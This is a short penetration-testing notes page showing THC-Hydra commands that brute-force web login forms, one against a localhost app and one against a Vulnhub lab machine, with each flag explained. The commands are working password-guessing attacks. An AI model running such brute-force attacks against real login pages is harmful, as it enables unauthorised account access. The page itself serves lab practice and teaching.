THC-Hydra BruteForce
Localhost Example
$ hydra -l [email protected] -P /usr/share/wordlists/rockyou.txt 127.0.0.1 http-post-form '/#/login:email=^USER^&password=^PASS^:Invalid email or password.' -fV -s 3000 -t 1
Vulnhub Example
When we enter a random key into the form at this page, we get “invalid key”. We can use this to formulate a hydra command. Choose big.txt
wordlist, select http-post-form
, the address 10.10.10.3
, the location of the form “/kzMb5nVYJw/index.php”
with our field “key” and the ^PASS^
string (the variables argument needs at least the strings ^USER^
, ^PASS^
, ^USER64^
or ^PASS64^
), and the third colon delimited argument that designates failure “invalid key”. -l
is for our login name which is empty, -f
is for exit when a login/pass pair is found, -V
is for verbose.
$ hydra -P /usr/share/dirb/wordlists/big.txt 10.10.10.3 http-post-form "/kzMb5nVYJw/index.php:key=^PASS^:invalid key" -fV -l ""
Last updated
Was this helpful?